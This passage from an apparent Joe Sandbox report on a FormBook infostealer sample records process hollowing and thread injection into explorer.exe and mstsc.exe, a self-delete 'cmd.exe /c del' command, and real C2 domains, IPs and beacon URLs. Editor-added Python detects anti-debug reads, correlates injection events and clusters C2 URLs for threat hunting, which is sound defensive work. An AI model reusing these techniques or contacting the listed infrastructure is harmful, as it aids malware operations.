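    """Every fs:[18h]/fs:[30h] load in the blob. Byte patterns can also hit data that
    merely looks like code, so treat the offsets as candidates to confirm in a disassembler."""
    hits = []
    for m in TEB_READ.finditer(code):
        raw = m.group(0)
        reg = "eax" if raw[1] == 0xA1 else REG32[(raw[2] >> 3) & 7]
        if m.group("off") == b"\x30":
            hits.append(TebRead(m.start(), reg, "ProcessEnvironmentBlock",
                                _peb_field_after(code, m.end(), reg)))
        else:
            hits.append(TebRead(m.start(), reg, "Self", "n/a"))
    return hits


def anti_debug_reads(code: bytes) -> list[TebRead]:
    """The subset worth triaging: PEB reads that go on to inspect debugger state."""
    return [h for h in find_teb_reads(code) if h.next_field in ANTI_DEBUG_FIELDS]


# Constructed 32-bit code for the example, not bytes from the sample: a BeingDebugged
# check, an NtGlobalFlag check, an ordinary Ldr walk and a TEB self-pointer load.
SAMPLE_CODE = bytes.fromhex(
    "64A130000000"    # mov eax, dword ptr fs:[30h]
    "0FB64002"        # movzx eax, byte ptr [eax+2]      -> PEB.BeingDebugged
    "85C0"            # test eax, eax
    "7505"            # jne short +5
    "648B0D30000000"  # mov ecx, dword ptr fs:[30h]
    "8B4168"          # mov eax, dword ptr [ecx+68h]     -> PEB.NtGlobalFlag
    "90"              # nop
    "648B1530000000"  # mov edx, dword ptr fs:[30h]
    "8B420C"          # mov eax, dword ptr [edx+0Ch]     -> PEB.Ldr (module walk, usually benign)
    "64A118000000"    # mov eax, dword ptr fs:[18h]      -> TEB.NtTib.Self
    "C3"              # ret
)

if __name__ == "__main__":
    for h in find_teb_reads(SAMPLE_CODE):
        print(f"+0x{h.offset:04X}: mov {h.register}, fs:[{h.teb_field}] -> {h.next_field}")
```

          Run against the unpacked FormBook image (the 1.2.Order 122001-220 guanzo.exe.400000.0.unpack listed further down) the counts per register would mirror the report's list; the useful output is the smaller set returned by anti_debug_reads, which is where to set breakpoints or patch when the sample has to be stepped under a debugger.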

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, domain query: www.shadyshainarae.com
          Source: C:\Windows\explorer.exe, domain query: www.xn--80aasvjfhla.xn--p1acf
          Source: C:\Windows\explorer.exe, network connect: 107.164.93.172:80
          Source: C:\Windows\explorer.exe, domain query: www.tjanyancha.com
          Source: C:\Windows\explorer.exe, network connect: 162.241.62.63:80
          Source: C:\Windows\explorer.exe, domain query: www.pocopage.com
          Source: C:\Windows\explorer.exe, network connect: 66.96.162.130:80
          Source: C:\Windows\explorer.exe, domain query: www.goodcreditcardshome.info
          Source: C:\Windows\explorer.exe, domain query: www.paperplaneexplorer.com
          Source: C:\Windows\explorer.exe, domain query: www.usapersonalshopper.com
          Source: C:\Windows\explorer.exe, network connect: 104.164.26.246:80
          Source: C:\Windows\explorer.exe, domain query: www.dmowang.com
          Source: C:\Windows\explorer.exe, domain query: www.comicstattoosnguns.com
          Source: C:\Windows\explorer.exe, network connect: 34.102.136.180:80
          Source: C:\Windows\explorer.exe, network connect: 18.219.49.238:80
          Source: C:\Windows\explorer.exe, domain query: www.thefrankversion.com
          Source: C:\Windows\explorer.exe, domain query: www.pasteleriaruth.com
          Source: C:\Windows\explorer.exe, domain query: www.goeseo.com
          Source: C:\Windows\explorer.exe, network connect: 198.54.117.216:80
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, memory written: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, base: 400000, value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, section loaded: unknown, target: C:\Windows\explorer.exe, protection: execute and read and write
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, section loaded: unknown, target: C:\Windows\SysWOW64\mstsc.exe, protection: execute and read and write
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, section loaded: unknown, target: C:\Windows\SysWOW64\mstsc.exe, protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exe, section loaded: unknown, target: C:\Windows\explorer.exe, protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exe, section loaded: unknown, target: C:\Windows\explorer.exe, protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\mstsc.exe, thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, section unmapped: C:\Windows\SysWOW64\mstsc.exe, base address: 9D0000
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, process created: C:\Users\user\Desktop\Order 122001-220 guanzo.exe C:\Users\user\Desktop\Order 122001-220 guanzo.exe
          Source: C:\Windows\SysWOW64\mstsc.exe, process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
          Source: explorer.exe, 00000002.00000002.931217061.0000000000AD8000.00000004.00000020.sdmp, binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000002.00000002.931555080.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.932307021.0000000003360000.00000002.00000001.sdmp, binary or memory string: Program Manager
          Source: explorer.exe, 00000002.00000002.931555080.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.932307021.0000000003360000.00000002.00000001.sdmp, binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.931555080.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.932307021.0000000003360000.00000002.00000001.sdmp, binary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.931555080.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.932307021.0000000003360000.00000002.00000001.sdmp, binary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.693486523.000000000A716000.00000004.00000001.sdmp, binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, queries volume information: C:\Users\user\Desktop\Order 122001-220 guanzo.exe VolumeInformation
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
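          Read as isolated rows, most of the evidence above is ambiguous: legitimate software maps sections into other processes, sets thread contexts and resumes suspended children. The verdict comes from correlation. Per source/target pair, a step that plants code (an unmapped image at 9D0000 in mstsc.exe, a buffer starting 4D5A written to base 400000 of a fresh child, an RWX section mapped into explorer.exe) is followed by a step that makes it run (a thread context set in process 3424, an APC queued into explorer.exe). Then a Windows system process, explorer.exe, that has just received code starts resolving domains and connecting to port 80, and mstsc.exe deletes the original sample through cmd.exe /c del. The Python below is an added example by the editor, not Joe Sandbox's code and not its export format: it correlates a constructed trace modelled on the rows above into those three findings. Process ids are invented (3424 is reused from the report and assumed here to be explorer.exe), the event field names are this example's own, and the svchost.exe DNS event is a control that must not be flagged because nothing injected into it.

```python
"""Correlate sandbox behaviour events into the findings this report leans on: a process
hollowing / thread injection chain, a Windows system process that talks to the network only
after receiving injected code, and a self-delete command. Added example for this page; the
event schema, the pids and every event below are constructed, not Joe Sandbox output."""
from collections import defaultdict

WRITE_OPS = {"section_unmapped", "memory_written_pe", "section_mapped_rwx"}   # code is planted
EXEC_OPS = {"thread_context_set", "apc_queued", "thread_resumed"}             # planted code runs
HOLLOW_OPS = {"section_unmapped", "memory_written_pe"}                        # image replaced in place
NETWORK_OPS = {"dns_query", "network_connect"}
SYSTEM_IMAGES = {"explorer.exe", "mstsc.exe", "svchost.exe", "cmd.exe"}      # %SystemRoot% binaries

SAMPLE = "Order 122001-220 guanzo.exe"


def ev(seq, pid, image, op, **extra):
    return {"seq": seq, "pid": pid, "image": image, "op": op, **extra}


# Constructed trace modelled on the report rows; pids are invented, 3424 assumed to be explorer.exe.
EVENTS = [
    ev(1, 4000, SAMPLE, "process_created", target_pid=4100, target_image=SAMPLE, suspended=True),
    ev(2, 4000, SAMPLE, "memory_written_pe", target_pid=4100, base=0x400000, head=b"MZ"),
    ev(3, 4000, SAMPLE, "thread_context_set", target_pid=4100),
    ev(4, 4000, SAMPLE, "thread_resumed", target_pid=4100),
    ev(5, 4100, SAMPLE, "section_mapped_rwx", target_pid=3424, target_image="explorer.exe"),
    ev(6, 4100, SAMPLE, "apc_queued", target_pid=3424),
    ev(7, 3424, "explorer.exe", "dns_query", name="www.shadyshainarae.com"),
    ev(8, 3424, "explorer.exe", "network_connect", addr="107.164.93.172", port=80),
    ev(9, 4100, SAMPLE, "process_created", target_pid=5000, target_image="mstsc.exe", suspended=True),
    ev(10, 4100, SAMPLE, "section_unmapped", target_pid=5000, base=0x9D0000),
    ev(11, 4100, SAMPLE, "memory_written_pe", target_pid=5000, base=0x400000, head=b"MZ"),
    ev(12, 4100, SAMPLE, "thread_context_set", target_pid=5000),
    ev(13, 5000, "mstsc.exe", "section_mapped_rwx", target_pid=3424, target_image="explorer.exe"),
    ev(14, 5000, "mstsc.exe", "thread_context_set", target_pid=3424),
    ev(15, 5000, "mstsc.exe", "process_created", target_pid=6000, target_image="cmd.exe",
       cmdline=f'cmd.exe /c del "C:\\Users\\user\\Desktop\\{SAMPLE}"'),
    ev(16, 7000, "svchost.exe", "dns_query", name="ctldl.windowsupdate.com"),   # control: never injected
]


def image_names(events):
    names = {}
    for e in events:
        names[e["pid"]] = e["image"]
        if "target_image" in e:
            names[e["target_pid"]] = e["target_image"]
    return names


def injection_chains(events):
    """Cross-process pairs that show both a write step and an execution-hijack step."""
    names = image_names(events)
    pairs = defaultdict(lambda: {"ops": set(), "last_seq": 0})
    for e in events:
        tgt = e.get("target_pid")
        if tgt is not None and tgt != e["pid"] and e["op"] in WRITE_OPS | EXEC_OPS:
            p = pairs[(e["pid"], tgt)]
            p["ops"].add(e["op"])
            p["last_seq"] = max(p["last_seq"], e["seq"])
    chains = []
    for (src, dst), p in sorted(pairs.items()):
        if p["ops"] & WRITE_OPS and p["ops"] & EXEC_OPS:
            chains.append({
                "source": (src, names.get(src, "?")), "target": (dst, names.get(dst, "?")),
                "technique": "process hollowing" if p["ops"] & HOLLOW_OPS else "thread injection",
                "last_seq": p["last_seq"],
            })
    return chains


def injected_system_processes_with_network(events):
    """System binaries that were an injection target and then issued DNS/connects: pid -> indicators."""
    injected_at = {}
    for c in injection_chains(events):
        pid, image = c["target"]
        if image in SYSTEM_IMAGES:
            injected_at[pid] = min(injected_at.get(pid, c["last_seq"]), c["last_seq"])
    findings = defaultdict(list)
    for e in events:
        if e["op"] in NETWORK_OPS and e["pid"] in injected_at and e["seq"] > injected_at[e["pid"]]:
            findings[e["pid"]].append(e.get("name") or f'{e["addr"]}:{e["port"]}')
    return dict(findings)


def self_delete_commands(events, sample_name=SAMPLE):
    """Command lines that delete the sample's own file (cmd /c del ... as in the report)."""
    return [e["cmdline"] for e in events if e["op"] == "process_created" and "cmdline" in e
            and " del " in e["cmdline"].lower() and sample_name.lower() in e["cmdline"].lower()]


if __name__ == "__main__":
    for c in injection_chains(EVENTS):
        print(f'{c["source"]} -> {c["target"]}: {c["technique"]}')
    print(injected_system_processes_with_network(EVENTS))
    print(self_delete_commands(EVENTS))
```

          The ordering check in injected_system_processes_with_network is what keeps explorer.exe's ordinary network use out of the result: only activity after the first injection into that pid counts, and a system process nothing injected into (the svchost.exe control) is never reported however many names it resolves.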

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, file source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match, file source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          One tactic per line; the number in brackets after a technique is the report's signature badge for that technique, copied as extracted. Techniques without a number are matrix placeholders the report did not match.

          Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
          Execution: Shared Modules [1], Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task
          Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
          Privilege Escalation: Process Injection [612], Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
          Defense Evasion: Masquerading [1], Disable or Modify Tools [1], Virtualization/Sandbox Evasion [31], Process Injection [612], Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [4], Software Packing [3]
          Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
          Discovery: Security Software Discovery [221], Process Discovery [2], Virtualization/Sandbox Evasion [31], Remote System Discovery [1], System Information Discovery [112], System Owner/User Discovery, Network Sniffing
          Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
          Collection: Archive Collected Data [1], Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
          Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
          Command and Control: Encrypted Channel [1], Ingress Tool Transfer [3], Non-Application Layer Protocol [3], Application Layer Protocol [13], Fallback Channels, Multiband Communication, Commonly Used Port
          Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points
          Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
          Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact

          Behavior Graph

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 412023. Sample: Order 122001-220 guanzo.exe. Start date: 12/05/2021. Architecture: WINDOWS. Score: 100.

          The graph, as a process tree (the original is an image):

          Start
            DNS/IP info: www.amesshop.com; amesshop.com
            Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
            |- Order 122001-220 guanzo.exe (started)
                 Dropped file: C:\Users\...\Order 122001-220 guanzo.exe.log, ASCII
                 Signature: Injects a PE file into a foreign processes
                 |- Order 122001-220 guanzo.exe (started)
                      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                      |- explorer.exe (injected)
                           DNS/IP info: pasteleriaruth.com 162.241.62.63, ports 49729 -> 80, UNIFIEDLAYER-AS-1, US, United States; www.dmowang.com 104.164.26.246, ports 49726 -> 80, EGIHOSTING, US, United States; 15 other IPs or domains
                           Signature: System process connects to network (likely due to code injection or exploit)
                           |- mstsc.exe (started)
                                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                                |- cmd.exe (started, 1 signature)
                                     |- conhost.exe (started)
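          The graph attributes the network activity to explorer.exe because the FormBook code runs there, and the URL table further down shows what that activity looks like: five different hosts (www.comicstattoosnguns.com, www.amesshop.com, www.pasteleriaruth.com, www.thefrankversion.com, www.pocopage.com) all requested with the same path /meub/ and the same two parameter names, 6lt4 and ktI, with 6lt4 carrying the identical value on every host. That fan-out of one URI shape over many domains is the FormBook pattern; a published FormBook analysis will confirm that the embedded host list is mostly decoys around the live C2, so the host set, not any single domain, is the indicator. The same table also carries strings such as http://www.founder.com.cn/cn/bThe and http://www.tiro.com, which are typically font-vendor URLs present in many clean binaries and should not become indicators. The Python below is an added example by the editor, not code from the sample, the report or Joe Sandbox: it copies the URL strings from the report's table, clusters them by URI shape, extracts the campaign-constant parameter, and builds a path regex for hunting in proxy logs. Everything else in it is constructed.

```python
"""Cluster the URLs a report attributes to the injected process by URI shape, so the
C2 set (one shape, many hosts) separates from incidental strings found in memory.
Added example for this page; not code from the sample, the report or Joe Sandbox.
The URL strings are copied from the report's URL table; the rest is constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

REPORT_URLS = [
    "http://www.comicstattoosnguns.com/meub/?6lt4=M6ATVT20FLj&ktI=QUeAVjOekbDfJHkoX1fEShfTueYawgYx/upvqY2KU2Y9ees5c1/xq3BWwCfJvPCdwXre",
    "http://www.amesshop.com/meub/?ktI=wuaJ69bwL+iBa6D7QaSRhbV0uekkoXOmRMeqk599uDu+rKjL/28r+d/9hZ/YryEoMLIX&6lt4=M6ATVT20FLj",
    "http://www.founder.com.cn/cn/bThe",
    "http://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox",
    "http://www.thefrankversion.com/meub/?ktI=xRifbL4BvWher3OHgQRKthYl2aDcqb2ql1CEYfUIGij2TzekdjVq3iFcomd6Mb6Rt5kB&6lt4=M6ATVT20FLj",
    "http://www.pocopage.com/meub/?ktI=9ZO5voGbPxiLxNlgiLAc+dZNiPLY07W/lgUO8wfbTKsVjaeGgcbK9o/DChjFDdb4OPcD&6lt4=M6ATVT20FLj",
    "http://www.tiro.com",
]

Shape = tuple[str, tuple[str, ...]]   # (path, sorted parameter names)


def url_shape(url: str) -> Shape:
    """Path plus parameter names, ignoring hosts and the per-request encrypted values."""
    parts = urlsplit(url)
    names = tuple(sorted({k for k, _ in parse_qsl(parts.query, keep_blank_values=True)}))
    return parts.path, names


def cluster_by_shape(urls: list[str]) -> dict[Shape, list[str]]:
    clusters = defaultdict(list)
    for u in urls:
        clusters[url_shape(u)].append(urlsplit(u).hostname)
    return dict(clusters)


def c2_candidates(urls: list[str], min_hosts: int = 3) -> dict[Shape, list[str]]:
    """Shapes shared by several distinct hosts. The fan-out is the signal; one-off
    strings like a font vendor's URL never reach min_hosts and drop out."""
    return {s: sorted(set(h)) for s, h in cluster_by_shape(urls).items() if len(set(h)) >= min_hosts}


def constant_params(urls: list[str], shape: Shape) -> dict[str, str]:
    """Parameters whose value never changes across the cluster: campaign constants worth pivoting on."""
    seen = defaultdict(set)
    for u in urls:
        if url_shape(u) == shape:
            for k, v in parse_qsl(urlsplit(u).query, keep_blank_values=True):
                seen[k].add(v)
    return {k: next(iter(v)) for k, v in seen.items() if len(v) == 1}


def hunting_regex(shape: Shape) -> str:
    """Anchored on the path and the fixed parameter names, loose on the encrypted values."""
    path, names = shape
    alt = "|".join(re.escape(n) for n in names)
    return rf"^{re.escape(path)}\?(?:{alt})=[^&]+(?:&(?:{alt})=[^&]+)*$"


def path_matches(shape: Shape, request_path: str) -> bool:
    """True when a proxy-log request path (path + query) fits the cluster's shape."""
    return re.match(hunting_regex(shape), request_path) is not None


if __name__ == "__main__":
    for shape, hosts in c2_candidates(REPORT_URLS).items():
        print(shape, hosts, constant_params(REPORT_URLS, shape))
        print(hunting_regex(shape))
```

          Feeding the regex a proxy log's request paths finds other hosts from the same campaign that this run never resolved (the report's own "15 other IPs or domains" is the hint that the list is longer than the five URLs shown), while the host list from c2_candidates is what goes into a blocklist, including the hosts that turn out to be decoys.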

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
Order 122001-220 guanzo.exe | 63% | Virustotal | -
Order 122001-220 guanzo.exe | 35% | Metadefender | -
Order 122001-220 guanzo.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
Order 122001-220 guanzo.exe | 100% | Joe Sandbox ML | -

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
1.2.Order 122001-220 guanzo.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

Source | Detection | Scanner | Label
www.dmowang.com | 0% | Virustotal | -

          URLs


          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
thefrankversion.com | 34.102.136.180 | true | false | - | unknown
amesshop.com | 34.102.136.180 | true | false | - | unknown
www.dmowang.com | 104.164.26.246 | true | true | - | unknown
parkingpage.namecheap.com | 198.54.117.216 | true | false | - | high
comicstattoosnguns.com | 34.102.136.180 | true | false | - | unknown
www.tjanyancha.com | 107.164.93.172 | true | true | - | unknown
shadyshainarae.com | 34.102.136.180 | true | false | - | unknown
www.goodcreditcardshome.info | 18.219.49.238 | true | true | - | unknown
www.goeseo.com | 66.96.162.130 | true | true | - | unknown
pasteleriaruth.com | 162.241.62.63 | true | true | - | unknown
www.shadyshainarae.com | unknown | unknown | true | - | unknown
www.xn--80aasvjfhla.xn--p1acf | unknown | unknown | true | - | unknown
www.pocopage.com | unknown | unknown | true | - | unknown
www.amesshop.com | unknown | unknown | true | - | unknown
www.paperplaneexplorer.com | unknown | unknown | true | - | unknown
www.usapersonalshopper.com | unknown | unknown | true | - | unknown
www.comicstattoosnguns.com | unknown | unknown | true | - | unknown
www.thefrankversion.com | unknown | unknown | true | - | unknown
www.pasteleriaruth.com | unknown | unknown | true | - | unknown

                                              Contacted URLs


                                              URLs from Memory and Binaries


                                                                      Contacted IPs


                                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
107.164.93.172 | www.tjanyancha.com | United States | 18779 | EGIHOSTINGUS | true
34.102.136.180 | thefrankversion.com | United States | 15169 | GOOGLEUS | false
18.219.49.238 | www.goodcreditcardshome.info | United States | 16509 | AMAZON-02US | true
162.241.62.63 | pasteleriaruth.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
66.96.162.130 | www.goeseo.com | United States | 29873 | BIZLAND-SDUS | true
104.164.26.246 | www.dmowang.com | United States | 18779 | EGIHOSTINGUS | true
198.54.117.216 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NETUS | false

                                                                      General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 412023
Start date: 12.05.2021
Start time: 10:49:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 13s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Order 122001-220 guanzo.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@13/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 12.4% (good quality ratio 10.9%)
• Quality average: 71.2%
• Quality standard deviation: 32.2%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 93
• Number of non-executed functions: 162
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe

Simulations

Behavior and APIs

Time | Type | Description
10:50:15 | API Interceptor | 1x Sleep call for process: Order 122001-220 guanzo.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
18.219.49.238 | PO9448882.exe | malicious | www.goodcreditcardshome.info/meub/?8p64Z2=V6A8xrZp&y8y=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045ev+tDntqFRk
18.219.49.238 | Bs04AQyK2o.exe | malicious | www.myattorneypicksnowonline.info/cyna/?AnB=O0DXDNwPE&GzuD=QlqunCFLfjJqxV/yJCze+AvWCSb5dgMSWlYge6YDzwoRQ//tSmh1eiTvl1ncSRgieIqF
18.219.49.238 | Additional Agreement 2020-KYC.exe | malicious | www.greaterdiabetes.info/bw82/?K4k0=QSf3WUlUuQtxRpqTh0PyZWAWCLqQSiplzZ1yvio+dQu1sol/QfNL/rp7Q9iT+rghV3Ar&dDH=P0GPezWpdVGtah
18.219.49.238 | INTABINA.exe | malicious | www.bipolartreatmentcenters.info/t65/?o8bdE=CaWwaRYeWES2ZpJp03tplUpNjUx+TtQQvGnSFVeAPVbx3JhsarFIKTbTEy9q2/vEn+U6&ElP=VZyLPx2Pwh4XuHxP
66.96.162.130 | 50% payment.exe | malicious | www.nicksayler.net/ey9c/?VRKt=wBZlC2d0f6W4LB&BZOPIF=zemMvuHYOZF6HFuoZzbL7otG0FuLt5HQ0QHjJ1h3UiaYeVUoeANMZZbryDjJGiqNYZ4O
66.96.162.130 | o0Ka2BsNBq.exe | malicious | www.imaginenationnetwork.com/8rg4/?AdkDpFa=8m/W0lhjduV58ZCB+v/V4udkt2Gx5MpGpLsDd1ppZKo4MszNwiI0YkW1Mn6ANFSTV5IZUjNr5g==&pPX=EFQD_FT0CVqx
66.96.162.130 | 43order pdf.exe | malicious | www.admarketingsales.com/nk7/?VBl=XTL8HNfpyPY&hdr4D=Lc54ZMkx7TXzX8Hn+HSOC/SDZ1fuYvEd/qDSQ5e94F4oyaPb0rbdlEOtPyLKhkDNTfwG
198.54.117.216 | Purchase Order.exe | malicious | www.beautiful.tours/u8nw/?jZhtajbP=MQ9/9ugzkHdx3WtCI0DhBFFcg9k9u8cd1L6Gj19/moDWYxZ8Cy1uW7tlf7fUay48reW+&wJB=-ZLXOP0XzvBHZPRp
198.54.117.216 | slot Charges.exe | malicious | www.beautiful.tours/u8nw/?iL3=MQ9/9ugzkHdx3WtCI0DhBFFcg9k9u8cd1L6Gj19/moDWYxZ8Cy1uW7tlf4zuZzUHop3vdg1M+Q==&z6A=7n3h7JeH
198.54.117.216 | 2B0CsHzr8o.exe | malicious | www.tab-nejersey.com/bncm/?LXedv=gRRRQVunFc3rumuoaYeGWZdKAARhtbqMo9o+4TfiCOcYfsgfAtZcdfy2djC7awoP2YIn&lhv4=O0DPaJ7hHb34yZ
198.54.117.216 | g1EhgmCqCD.exe | malicious | www.donelys.com/8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9P
